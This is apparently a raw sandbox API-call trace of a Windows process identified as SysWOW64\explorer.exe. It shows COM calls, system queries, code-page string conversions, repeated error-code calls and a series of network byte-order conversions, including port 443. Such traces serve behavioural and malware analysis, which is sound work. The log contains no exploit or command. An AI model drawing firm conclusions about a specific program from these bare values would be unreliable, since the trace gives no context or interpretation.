[0045.627] IClassFactory:CreateInstance (in: This=0xab81567160, pUnkOuter=0x0, riid=0xabfe9fd250*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0xabfe9fc368 | out: ppvObject=0xabfe9fc368*=0xab81567570) returned 0x0
[0045.627] GetSystemInfo (in: lpSystemInfo=0xabfe9fc1e8 | out: lpSystemInfo=0xabfe9fc1e8*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03))
[0045.627] VirtualQuery (in: lpAddress=0xabfe9fc1e0, lpBuffer=0xabfe9fc218, dwLength=0x30 | out: lpBuffer=0xabfe9fc218*(BaseAddress=0xabfe9fc000, AllocationBase=0xabfe900000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xffffd000)) returned 0x30
[0045.628] IUnknown:AddRef (This=0xab81567570) returned 0x2
[0045.628] IUnknown:Release (This=0xab81567570) returned 0x1
[0045.628] IUnknown:Release (This=0xab81567160) returned 0x0
[0045.628] IUnknown:QueryInterface (in: This=0xab81567570, riid=0x7ffb2dcee808*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0xabfe9fd898 | out: ppvObject=0xabfe9fd898*=0xab81567570) returned 0x0
[0045.628] IUnknown:Release (This=0xab81567570) returned 0x1
[0045.628] _strnicmp (_Str1="?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿbĀ") returned 256
[0053.586] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿbĀ", cchSrc=256, lpCharType=0x2cf41c | out: lpCharType=0x2cf41c) returned 1
[0053.586] GetLastError () returned 0x0
[0053.586] SetLastError (dwErrCode=0x0)
[0053.586] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1
[0053.586] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf81c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0053.586] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf81c, cbMultiByte=256, lpWideCharStr=0x2cf158, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
[0053.586] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256
[0053.586] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2cef48, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
[0053.586] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x2cf71c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84
\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84
\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÊY.ôTù,", lpUsedDefaultChar=0x0) returned 256
[0053.586] GetLastError () returned 0x0
[0053.586] SetLastError (dwErrCode=0x0)
[0053.586] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf81c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
[0053.586] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2cf81c, cbMultiByte=256, lpWideCharStr=0x2cf178, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
[0053.586] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256
[0053.586] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x2cef68, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256
[0053.586] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x2cf61c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84
\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84
\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84
\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÊY.ôTù,", lpUsedDefaultChar=0x0) returned 256
[0053.586] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x633b00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\explorer.exe" (normalized: "c:\\windows\\syswow64\\explorer.exe")) returned 0x20
[0053.586] GetLastError () returned 0x0
[0053.586] SetLastError (dwErrCode=0x0)
[0053.586] GetLastError () returned 0x0
[0053.586] SetLastError (dwErrCode=0x0)
[0053.586] GetLastError () returned 0x0
[0053.586] SetLastError (dwErrCode=0x0)
[0053.586] GetLastError () returned 0x0
[0053.586] SetLastError (dwErrCode=0x0)
[0053.586] GetLastError () returned 0x0
[0053.586] SetLastError (dwErrCode=0x0)
[0053.586] GetLastError () returned 0x0
[0053.586] SetLastError (dwErrCode=0x0)
[0053.586] GetLastError () returned 0x0
[0053.586] SetLastError (dwErrCode=0x0)
[0053.587] GetLastError () returned 0x0
[0053.587] SetLastError (dwErrCode=0x0)
[0053.587] GetLastError () returned 0x0
[0053.587] SetLastError (dwErrCode=0x0)
[0053.587] GetLastError () returned 0x0
[0053.587] SetLastError (dwErrCode=0x0)
[0053.587] GetLastError () returned 0x0
[0053.587] SetLastError (dwErrCode=0x0)
[0053.587] GetLastError () returned 0x0
[0053.587] SetLastError (dwErrCode=0x0)
[0053.587] GetLastError () returned 0x0
[0053.587] SetLastError (dwErrCode=0x0)
[0053.587] GetLastError () returned 0x0
[0053.587] SetLastError (dwErrCode=0x0)
[0053.587] GetLastError () returned 0x0
[0053.587] SetLastError (dwErrCode=0x0)
[0053.587] GetLastError () returned 0x0
[0053.587] SetLastError (dwErrCode=0x0)
[0053.587] GetLastError () returned 0x0
[0053.587] SetLastError (dwErrCode=0x0)
[0053.587] GetLastError () returned 0x0
[0053.587] SetLastError (dwErrCode=0x0)
[0053.587] GetLastError () returned 0x0
[0053.587] SetLastError (dwErrCode=0x0)
[0053.587] GetLastError () returned 0x0
[0053.587] SetLastError (dwErrCode=0x0)
[0053.587] GetLastError () returned 0x0
[0053.587] SetLastError (dwErrCode=0x0)
[0053.587] GetLastError () returned 0x0
[0053.587] SetLastError (dwErrCode=0x0)
[0053.587] GetLastError () returned 0x0
[0053.587] SetLastError (dwErrCode=0x0)
[0053.587] GetLastError () returned 0x0
[0053.587] SetLastError (dwErrCode=0x0)
[0053.587] GetLastError () returned 0x0
[0053.587] SetLastError (dwErrCode=0x0)
[0053.587] GetLastError () returned 0x0
[0053.587] SetLastError (dwErrCode=0x0)
[0053.587] GetLastError () returned 0x0
[0053.588] SetLastError (dwErrCode=0x0)
[0053.588] GetLastError () returned 0x0
[0053.588] SetLastError (dwErrCode=0x0)
[0053.588] GetLastError () returned 0x0
[0053.588] SetLastError (dwErrCode=0x0)
[0053.588] GetLastError () returned 0x0
[0053.588] SetLastError (dwErrCode=0x0)
[0053.588] GetLastError () returned 0x0
[0053.588] SetLastError (dwErrCode=0x0)
[0053.588] GetLastError () returned 0x0
[0053.588] SetLastError (dwErrCode=0x0)
[0053.588] GetLastError () returned 0x0
[0053.588] SetLastError (dwErrCode=0x0)
[0053.588] GetLastError () returned 0x0
[0053.588] SetLastError (dwErrCode=0x0)
[0053.588] GetLastError () returned 0x0
[0053.588] SetLastError (dwErrCode=0x0)
[0053.588] GetLastError () returned 0x0
[0053.588] SetLastError (dwErrCode=0x0)
[0053.588] GetLastError () returned 0x0
[0053.588] SetLastError (dwErrCode=0x0)
[0053.588] GetLastError () returned 0x0
[0053.588] SetLastError (dwErrCode=0x0)
[0053.588] GetLastError () returned 0x0
[0053.588] SetLastError (dwErrCode=0x0)
[0053.588] GetLastError () returned 0x0
[0053.588] SetLastError (dwErrCode=0x0)
[0053.588] GetLastError () returned 0x0
[0053.588] SetLastError (dwErrCode=0x0)
[0053.588] GetLastError () returned 0x0
[0053.588] SetLastError (dwErrCode=0x0)
[0053.589] GetLastError () returned 0x0
[0053.589] SetLastError (dwErrCode=0x0)
[0053.589] GetLastError () returned 0x0
[0053.589] SetLastError (dwErrCode=0x0)
[0053.589] GetLastError () returned 0x0
[0053.589] SetLastError (dwErrCode=0x0)
[0053.589] GetLastError () returned 0x0
[0053.589] SetLastError (dwErrCode=0x0)
[0053.589] GetLastError () returned 0x0
[0053.589] SetLastError (dwErrCode=0x0)
[0053.589] GetLastError () returned 0x0
[0053.589] SetLastError (dwErrCode=0x0)
[0053.589] GetLastError () returned 0x0
[0053.589] SetLastError (dwErrCode=0x0)
[0053.589] GetLastError () returned 0x0
[0053.589] SetLastError (dwErrCode=0x0)
[0053.589] GetLastError () returned 0x0
[0053.589] SetLastError (dwErrCode=0x0)
[0053.589] GetLastError () returned 0x0
[0053.589] SetLastError (dwErrCode=0x0)
[0053.589] GetLastError () returned 0x0
[0053.589] SetLastError (dwErrCode=0x0)
[0053.589] GetLastError () returned 0x0
[0053.589] SetLastError (dwErrCode=0x0)
[0053.589] GetLastError () returned 0x0
[0053.589] SetLastError (dwErrCode=0x0)
[0053.589] GetLastError () returned 0x0
[0053.589] SetLastError (dwErrCode=0x0)
[0053.589] GetLastError () returned 0x0
[0053.589] SetLastError (dwErrCode=0x0)
[0053.589] GetLastError () returned 0x0
[0053.589] SetLastError (dwErrCode=0x0)
[0053.589] GetLastError () returned 0x0
[0053.589] SetLastError (dwErrCode=0x0)
[0053.589] GetLastError () returned 0x0
[0053.589] SetLastError (dwErrCode=0x0)
[0053.589] GetLastError () returned 0x0
[0053.589] SetLastError (dwErrCode=0x0)
[0053.589] GetLastError () returned 0x0
[0053.589] SetLastError (dwErrCode=0x0)
[0053.590] GetLastError () returned 0x0
[0053.590] SetLastError (dwErrCode=0x0)
[0053.590] GetLastError () returned 0x0
[0053.590] SetLastError (dwErrCode=0x0)
[0053.590] GetLastError () returned 0x0
[0053.590] SetLastError (dwErrCode=0x0)
[0053.590] GetLastError () returned 0x0
[0053.590] SetLastError (dwErrCode=0x0)
[0053.591] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf998 | out: lpSystemTimeAsFileTime=0x2cf998*(dwLowDateTime=0xef962262, dwHighDateTime=0x1d3a68a))
[0053.591] htons (hostshort=0x100) returned 0x1
[0053.591] htons (hostshort=0x100) returned 0x1
[0053.591] htons (hostshort=0x200) returned 0x2
[0053.591] htons (hostshort=0x800) returned 0x8
[0053.591] htons (hostshort=0x200) returned 0x2
[0053.591] htons (hostshort=0x100) returned 0x1
[0053.591] htons (hostshort=0x200) returned 0x2
[0053.591] htons (hostshort=0xbb01) returned 0x1bb
[0053.591] htons (hostshort=0x300) returned 0x3
[0053.591] htons (hostshort=0x200) returned 0x2
[0053.591] htons (hostshort=0x400) returned 0x4
[0053.591] htonl (hostlong=0x983a0000) returned 0x3a98
[0053.592] htons (hostshort=0x400) returned 0x4
[0053.592] htons (hostshort=0x200) returned 0x2
[0053.592] htons (hostshort=0x400) returned 0x4
[0053.592] htonl (hostlong=0x1000) returned 0x100000
[0053.592] htons (hostshort=0x500) returned 0x5
[0053.592] htons (hostshort=0x100) returned 0x1
[0053.592] htons (hostshort=0x200) returned 0x2
[0053.592] htons (hostshort=0x1400) returned 0x14
[0053.592] htons (hostshort=0x600) returned 0x6
[0053.592] htons (hostshort=0x100) returned 0x1
[0053.592] htons (hostshort=0x200) returned 0x2
[0053.592] htons (hostshort=0xff00) returned 0xff
[0053.592] htons (hostshort=0x700) returned 0x7
[0053.592] htons (hostshort=0x300) returned 0x3
[0053.592] htons (hostshort=0x1) returned 0x100
[0053.592] htons (hostshort=0x800) returned 0x8
[0053.592] htons (hostshort=0x300) returned 0x3
[0053.592] htons (hostshort=0x1) returned 0x100
[0053.592] htons (hostshort=0x900) returned 0x9
[0053.592] htons (hostshort=0x300) returned 0x3
[0053.592] htons (hostshort=0x8000) returned 0x80
[0053.592] htons (hostshort=0xa00) returned 0xa
[0053.592] htons (hostshort=0x300) returned 0x3
[0053.592] htons (hostshort=0x4000) returned 0x40
[0053.592] htons (hostshort=0xb00) returned 0xb
[0053.592] htons (hostshort=0x300) returned 0x3
[0053.592] htons (hostshort=0x1) returned 0x100
[0053.592] htons (hostshort=0xc00) returned 0xc
[0053.592] htons (hostshort=0x300) returned 0x3
[0053.592] htons (hostshort=0x1) returned 0x100
[0053.592] htons (hostshort=0xd00) returned 0xd
[0053.592] htons (hostshort=0x300) returned 0x3
[0053.592] htons (hostshort=0x1) returned 0x100
[0053.592] htons (hostshort=0x1d00) returned 0x1d
[0053.592] htons (hostshort=0x300) returned 0x3
[0053.592] htons (hostshort=0x4000) returned 0x40
[0053.592] htons (hostshort=0x1e00) returned 0x1e
[0053.592] htons (hostshort=0x300) returned 0x3
[0053.592] htons (hostshort=0x4000) returned 0x40
[0053.592] htons (hostshort=0xf00) returned 0xf
[0053.592] htons (hostshort=0x300) returned 0x3
[0053.592] htons (hostshort=0x8000) returned 0x80
[0053.592] htons (hostshort=0x1f00) returned 0x1f
[0053.592] htons (hostshort=0x100) returned 0x1
[0053.592] htons (hostshort=0x200) returned 0x2
[0053.592] htons (hostshort=0x0) returned 0x0
[0053.592] htons (hostshort=0x1300) returned 0x13
[0053.592] htons (hostshort=0x200) returned 0x2
[0053.592] htons (hostshort=0x400) returned 0x4
[0053.592] htonl (hostlong=0x0) returned 0x0
[0053.592] htons (hostshort=0x1400) returned 0x14
[0053.592] htons (hostshort=0x200) returned 0x2
[0053.592] htons (hostshort=0x400) returned 0x4
[0053.592] htonl (hostlong=0x0) returned 0x0
[0053.592] htons (hostshort=0x1a00) returned 0x1a
[0053.592] htons (hostshort=0x300) returned 0x3
[0053.592] htons (hostshort=0x1000) returned 0x10
[0053.592] htons (hostshort=0x1b00) returned 0x1b
[0053.592] htons (hostshort=0x300) returned 0x3
[0053.592] htons (hostshort=0x1000) returned 0x10
[0053.592] htons (hostshort=0x1c00) returned 0x1c
[0053.592] htons (hostshort=0x200) returned 0x2
[0053.592] htons (hostshort=0x400) returned 0x4
[0053.593] htonl (hostlong=0x0) returned 0x0
[0053.593] htons (hostshort=0x2500) returned 0x25
[0053.593] htons (hostshort=0x200) returned 0x2
[0053.593] htons (hostshort=0x400) returned 0x4
[0053.593] htonl (hostlong=0x59c5bd62) returned 0x62bdc559
[0053.593] htons (hostshort=0x2300) returned 0x23
[0053.593] htons (hostshort=0x100) returned 0x1
[0053.593] htons (hostshort=0x200) returned 0x2
[0053.593] htons (hostshort=0x200) returned 0x2
[0053.593] htons (hostshort=0x1000) returned 0x10
[0053.593] htons (hostshort=0x100) returned 0x1
[0053.593] htons (hostshort=0x200) returned 0x2
[0053.593] htons (hostshort=0xe207) returned 0x7e2
[0053.593] htons (hostshort=0x1100) returned 0x11
[0053.593] htons (hostshort=0x100) returned 0x1
[0053.593] htons (hostshort=0x200) returned 0x2
[0053.593] htons (hostshort=0x300) returned 0x3
[0053.593] htons (hostshort=0x1200) returned 0x12
[0053.593] htons (hostshort=0x100) returned 0x1
[0053.593] htons (hostshort=0x200) returned 0x2
[0053.593] htons (hostshort=0x1f00) returned 0x1f
[0053.593] htons (hostshort=0x2400) returned 0x24
[0053.593] htons (hostshort=0x100) returned 0x1
[0053.593] htons (hostshort=0x200) returned 0x2
[0053.593] htons (hostshort=0x300) returned 0x3
[0053.593] htons (hostshort=0x0) returned 0x0
[0053.593] GetACP () returned 0x4e4
[0053.593] GetOEMCP () returned 0x1b5
